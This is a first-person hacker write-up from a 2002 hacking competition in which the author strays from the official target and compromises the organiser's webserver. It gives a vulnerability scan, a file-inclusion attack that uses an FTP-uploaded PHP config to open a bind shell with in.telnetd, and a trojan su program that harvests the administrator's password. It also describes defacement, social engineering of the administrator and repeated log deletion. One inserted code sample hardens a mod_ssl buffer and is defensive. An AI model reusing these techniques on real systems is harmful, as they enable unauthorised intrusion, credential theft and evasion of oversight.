- WOKSDOME Global Hacking Competition -
===============================================================================================
Thank you for your participation.
The information on the target server is shown below:

IP Address of Target server : 210.183.179.112
Target html (to alter) : the first page screen (index.html)

An individual (or team) who is first to change the index.html file by writing his/her own
Registration number, ID, Identification No, and email on it will be the winner.

P.S: Hmm... I am leaving this here so that I do not forget later on what I did.
For reference, it was written hastily, so the text is not very coherent. --;
===============================================================================================

First, the server 210.183.179.112 was disclosed. The open-source smoothwall program was
installed on it. Of course, only one port was open: 81.

Looking up the server's information first, it was running a vulnerable version of mod_ssl.
The remote buffer overflow vulnerability in the SSL and TLS protocol module had already been
published on the Internet. The report title is "Apache mod_ssl 2.8.3/Apache-SSL Buffer
Overflow Vulnerability". Analyzing the actual source, the vulnerability did exist, as the
other report demonstrates.

--- ssl_util_ssl.h: --------------------------------------------------------------------------

#define SSL_SESSION_MAX_DER 1024*10

--- ssl_scache_dbm.c: ------------------------------------------------------------------------

BOOL ssl_scache_dbm_store(server_rec *s, UCHAR *id, int idlen,
                          time_t expiry, SSL_SESSION *sess)
{
    ...
    UCHAR ucaData[SSL_SESSION_MAX_DER];
    ...
    ucp = ucaData;
    nData = i2d_SSL_SESSION(sess, &ucp);

----------------------------------------------------------------------------------------------

However, there were several obstacles to exploiting it. The most critical was that, in order
to use the vulnerability, one first has to obtain the Certificate Authority (the mutual
authentication between client and server). Once that is obtained, remote commands can be
executed with the privileges of the ssl module. But this was very hard to do.
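The ssl_scache_dbm_store() snippet above serialises a session straight into a fixed 10 KB stack buffer without checking the encoded length first. As an added example (not mod_ssl's or OpenSSL's code), here is the same pattern with the check a maintainer would put in front of it; fake_session and i2d_fake_session are stand-ins for SSL_SESSION and i2d_SSL_SESSION, and store_len_for_blob_size is a constructed helper for exercising it.

```c
/* Added example, not mod_ssl's code: ssl_scache_dbm_store()'s fixed buffer
 * with a length check before serialising. fake_session and i2d_fake_session
 * stand in for SSL_SESSION and i2d_SSL_SESSION, keeping OpenSSL's rule that
 * a NULL output pointer makes i2d return the encoded length without writing. */
#include <stdlib.h>
#include <string.h>
#define SSL_SESSION_MAX_DER 1024*10    /* same constant as ssl_util_ssl.h */
typedef struct { const unsigned char *blob; int len; } fake_session;  /* constructed */

/* Toy encoder: 4-byte big-endian length prefix, then the blob.
 * Returns the total encoded length; writes only when pp is non-NULL. */
static int i2d_fake_session(const fake_session *s, unsigned char **pp)
{
    int total = 4 + s->len, i;
    if (pp != NULL) {
        unsigned char *p = *pp;
        for (i = 0; i < 4; i++)
            p[i] = (unsigned char)(s->len >> (24 - 8 * i));
        memcpy(p + 4, s->blob, (size_t)s->len);
        *pp = p + total;               /* i2d advances the caller's pointer */
    }
    return total;
}

/* Hardened store. The page's code calls i2d straight into ucaData; here the
 * length is queried first and an oversize session is refused (returns 0). */
int scache_store_safe(const fake_session *sess, int *out_len)
{
    unsigned char ucaData[SSL_SESSION_MAX_DER];
    unsigned char *ucp = ucaData;
    int nData = i2d_fake_session(sess, NULL);      /* length only, no write */
    if (nData <= 0 || nData > (int)sizeof(ucaData))
        return 0;                                  /* would overflow: refuse */
    nData = i2d_fake_session(sess, &ucp);          /* now known to fit */
    *out_len = nData;
    return 1;
}

/* Build a constructed session of blob_len bytes; return the stored length,
 * or -1 when the store was refused. */
int store_len_for_blob_size(int blob_len)
{
    unsigned char *blob = calloc((size_t)blob_len + 1, 1);
    fake_session s = { blob, blob_len };
    int stored = -1;
    scache_store_safe(&s, &stored);
    free(blob);
    return stored;
}
```

A session whose encoding is exactly 10240 bytes still fits; one byte more is refused instead of running past ucaData.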
The smoothwall in question likewise required getting through several Apache authentications.
The hackers who discovered it tried all sorts of brute-force, and the target server was
practically crawling(?). :-(

Just as I was thinking it would be hard to find another way, the webserver
(http://www.woksdome.org) got hacked. Of course, it was a server I had not even scanned once,
but I was very curious and my attention started to turn in that direction. The following is
the information at the time of scanning.

IP Address       : 128.134.7.245
Resolved         : www.woksdome.org
Operating System : Linux - RedHat 7.0
- Open Ports (11):

21 [ Ftp => File Transfer Protocol ]
   220 BCA1OOPSRC2 FTP Server (ProFTPD Default Installation-WOW) [www.woksdome.org]
   *** Anonymous login OK ***

22 [ Ssh => Remote Login Protocol ]
   SSH-1.99-OpenSSH_2.3.0p1
   *** OpenSSH 2.3 Channel Code Off-By-One remote bug OK ***

23 [ Telnet => Remote Login Protocol ]
   WOWLINUX Release 7.0 (AllLiEs)
   *** Telnetd remote buffer overflow OK ***

25 [ Smtp => Simple Mail Transfer Protocol ]
   220 www.woksdome.org ESMTP Sendmail 8.11.0/8.11.0; Wed, 17 Apr 2002 21:23:37 +0900
   *** Sendmail 8.11.0/8.11.0 - Multiple local bug ***

79 [ Finger ]
   Login Name Tty Idle Login Time Office Office Phone
   Users (1):
   root
   Directory: /root
   Shell: /bin/bash
   On since Sat Apr 13 18:25 (KST) on tty1 4 days idle
   New mail received Wed Apr 17 21:01 2002 (KST)
   Unread since Tue Apr 16 23:15 2002 (KST)
   No Plan.
   root     root     tty1   4d   Apr 13 18:25
   *** Cfingerd util-c buffer overflow OK ***
   Description : The cfingerd package versions 1.4.3 and earlier is vulnerable to a buffer
                 overflow in the util.c file
   Bugtraq ID/URL : http://xforce.iss.net/static/6744.php

80 [ Http => World Wide Web, HTTP ]
   HTTP/1.1 200 OK
   Date: Wed, 17 Apr 2002 12:23:37 GMT
   Server: Apache/1.3.22 (Unix) PHP/4.1.2
   X-Powered-By: PHP/4.1.2
   Connection: close
   Content-Type: text/html
   PHP module running (web server)
   Description : PHP is installed on this computer

111 [ SunRPC => SUN Remote Procedure Call ]
   portmapper, Ver : 2, Proto : TCP, Port : 111
   portmapper, Ver : 2, Proto : UDP, Port : 111
   nlockmgr,   Ver : 1, Proto : UDP, Port : 1024
   nlockmgr,   Ver : 3, Proto : UDP, Port : 1024
   status,     Ver : 1, Proto : UDP, Port : 1025
   status,     Ver : 1, Proto : TCP, Port : 1024
   *** Rpc.statd remote format string OK ***

113 [ identd => Authentication Service ]
   0 , 0 : X-VERSION : pidentd 3.0.10 for Linux 2.2.5-22smp (Jul 20 2000 15:09:20)
   *** Xinetd remote buffer overflow OK ***

513 [ Login => Remote login (a la telnet) ]
514 [ Shell => cmd ]
515 [ printer => Printer Spooler ]
   *** Lprnd remote format string OK ***

There were far too many vulnerabilities. In general, the telnetd in the RedHat default kit
has a vulnerability. I exploited it. I finally got a shell and looked at the very complicated
files inside the server. ^^ I considered installing an LKM but decided against it. Honestly,
since this had clearly strayed from the intent of the competition... I did not want to
complicate things any further. As the next task, I found and deleted all of my logs on the
system. This stopped at simply obtaining internal privileges on the server.

In the same network range I was able to find a BSD server at IP .65 and a router at IP .126.
The router password was really easy: "root" seemed guessable by plain guessing. I decided to
put the attack on .65 on hold. Of course, since I did not know the router's enable password
either, obtaining the administrator's server password was important.

I attacked the webserver again. Looking at the web side, it was really vulnerable. --; The
board directory path had no index page at all.
===============================================================================================
Parent Directory        16-Apr-2002 18:21    -
admin.php               10-Apr-2002 23:44    2k
admin_list.php          10-Apr-2002 23:44   16k
admin_viewbody.php      10-Apr-2002 23:44   11k
bdeleteform.php         10-Apr-2002 23:44    7k
blist.php               10-Apr-2002 23:44    1k
bmodifyform.php         10-Apr-2002 23:44    6k
board.cfg               10-Apr-2002 23:44    1k
board.php3              10-Apr-2002 23:44    1k
board.sql               10-Apr-2002 23:44    1k
board_css.css           10-Apr-2002 23:44    1k
board_files/            06-Apr-2002 19:45    -
board_icon.zip/         10-Apr-2002 07:33    -
board_icon/             09-Apr-2002 08:55    -
boardadmin.sql          10-Apr-2002 23:44    1k
bpostform.php           10-Apr-2002 23:44    3k
breplyform.php          10-Apr-2002 23:44    5k
bviewbody.php           10-Apr-2002 23:44   13k
con_bbs.sql             10-Apr-2002 23:44    1k
dbconn.php              10-Apr-2002 23:44    1k
del_mul_proc.php        10-Apr-2002 23:44    1k
delete.php              10-Apr-2002 23:44    3k
deleteform.php          10-Apr-2002 23:44    7k
edit.html               10-Apr-2002 23:44   31k
editimg/                06-Apr-2002 21:03    -
editor.html             10-Apr-2002 23:44    6k
footer.inc              10-Apr-2002 23:44    1k
get.php                 10-Apr-2002 23:44    4k
header.inc              10-Apr-2002 23:44    1k
htmlact.php             10-Apr-2002 23:44    5k
image/                  06-Apr-2002 21:03    -
list.inc                10-Apr-2002 23:45   15k
list.php                10-Apr-2002 23:45    7k
list_admin.php          10-Apr-2002 23:45    1k
menu_modify.php         10-Apr-2002 23:45    1k
menu_modifyform.php     10-Apr-2002 23:45   24k
modify.php              10-Apr-2002 23:45    3k
modifyform.php          10-Apr-2002 23:45    7k
modifyform_admin.php    10-Apr-2002 23:45   13k
post.php                10-Apr-2002 23:45    4k
post_admin.php          10-Apr-2002 23:45    4k
postform.php            10-Apr-2002 23:45    7k
postform_admin.php      10-Apr-2002 23:45    4k
reply.php               10-Apr-2002 23:45    2k
reply_admin.php         10-Apr-2002 23:45    7k
replyform.php           10-Apr-2002 23:45    7k
replyform_admin.php     10-Apr-2002 23:45    6k
select.php              10-Apr-2002 23:45    5k
sendmail.php            10-Apr-2002 23:45   11k
up_image/               10-Apr-2002 07:33    -
url_autolink.inc        10-Apr-2002 23:45    2k
user_function.inc       10-Apr-2002 23:45    4k
view_list.php           10-Apr-2002 23:45   16k
view_list_admin.php     10-Apr-2002 23:45   16k
view_reply.php          10-Apr-2002 23:45   15k
viewbody.php            10-Apr-2002 23:45    7k
viewbody_admin.php      10-Apr-2002 23:45   14k
===============================================================================================

First, I examined a few of these files, and I was able to find a vulnerability right away. It
was in the way the board configuration file is referenced; the vulnerability occurs right
there. board.cfg can be seen above. I checked whether it was possible to read the cfg by its
actual PATH:

"?code=/usr/local/apache/htdocs/board/board"

Oh my... it outputs the same result as "?code=board". With this, the possibility of an attack
was proven.

I connected to ftp. That file upload is possible as anonymous can be seen from the scan
results above. There I uploaded an arbitrary cfg that I had made. Its contents were simple,
as follows:

...
system("echo \"#!/bin/sh\n/bin/bash -i\n\" >/tmp/test;chmod 711 /tmp/test");
system("/usr/sbin/in.telnetd -debug 60177 -L/tmp/test");
?>

Then I had this cfg file read in:

"?code=/var/ftp/code"

Very easily, port 60177 on the webserver was opened. I could connect to the server again, and
with an internal setuid vulnerability I obtained root privileges. Likewise, I found and
deleted the related logs.

This time, feeling mischievous, I looked into how far the administrator actually managed the
system. I changed index.html in white font as follows. For reference, the screen below stayed
as it was from the evening of the first day of the competition until the morning of the last
day.

(screenshot: woksdome1.jpg)

The administrator does not seem to have paid any attention at all. :-]

Anyway, I thought I needed the password the administrator was using. The reason is that the
passwords across the servers someone manages are usually nearly the same, if not identical.
At first I thought about pulling out the shadow file and cracking it. But that seemed like it
would take an enormous amount of time. So I thought of another way.

First, to block other people's access(?), I cleaned up a few daemons and adjusted permissions
as follows:

- board/ board_en/ permission check && touch index.html
- Anonymous login closed
- Fingerd port closed
- SunRpcd port closed
- Lprnd port closed

Then I waited until 10 a.m. on the last day.
I ran the following source to temporarily replace the su program with a trojan horse.

--- su.c source ------------------------------------------------------------------------------

#!/bin/sh
# make fake SU file ;-)
(printf "\r\nNULL\r\n")|/bin/su;mv /bin/su /bin/su.bak
cat > /bin/su.c << EOF
/* standard headers restored; the angle-bracketed names were lost in extraction */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
main (int argc,char *argv[])
{
    FILE *fp;
    char passwd[20];
    printf("Password: ");
    system("stty -echo");
    scanf("%s",passwd);
    sleep(2);
    printf("\nsu: incorrect password\n");
    system("stty echo");
    if((fp=fopen("//usr//local//apache//htdocs//pass","a"))==NULL)
    {
        exit(0);
    }
    fprintf(fp, "ID : %s\n",argv[1]);
    fprintf(fp, "PASSWD : %s\n", passwd);
    fclose(fp);
    system("/bin/fake");
}
EOF
# fake command :-D
cat > /bin/fake.c << EOF
main()
{
    setuid(0);
    setgid(0);
    system("mv /bin/su.bak /bin/su;rm -rf /bin/fake");
}
EOF
# Last Setting
mv /bin/su /bin/su.bak
gcc -o /bin/su /bin/su.c && rm -rf /bin/su.c
gcc -o /bin/fake /bin/fake.c && rm -rf /bin/fake.c
chmod 4755 /bin/fake; chmod 4755 /bin/su
# EOF

----------------------------------------------------------------------------------------------

The problem was getting the administrator to run the su command. First, I killed the
"kdworks" user who was logged in, and waited for them to log in again. They did not seem to
log in right away, though. So I thought of another way.

First, so that the administrator would log in and run the su command, I temporarily changed
the WOKSDOME webserver's page as follows.

(screenshot: woksdome2.jpg)

I put it into read-only mode with chattr and waited until the file
"/usr/local/apache/htdocs/pass" was created. Finally, as I had expected, the administrator
logged in in less than 5 minutes. After the su command, they typed the password precisely and
correctly. :-)

ID : -
PASSWD : xxxxxxxx

I read that file and obtained the administrator's password. Right after that, I unset chattr
and tried the obtained password on the other servers' login prompts. Hmm... but as it turned
out, the WOKSDOME webserver's password was specific to that webserver only.
Obtaining the router enable password, the original goal, was impossible, and I could not get
past the password authentication of the other servers (especially .112). Of course, I kept
cleaning the server's logs the whole time. :-D For reference, I felt that I needed the
webserver in order to attack .112(?). :-p

From here on, the rest is a secret!

-- By "you dong-hun" (Xpl017Elz), in INetCop(c). home? http://x82.i21c.net - :-p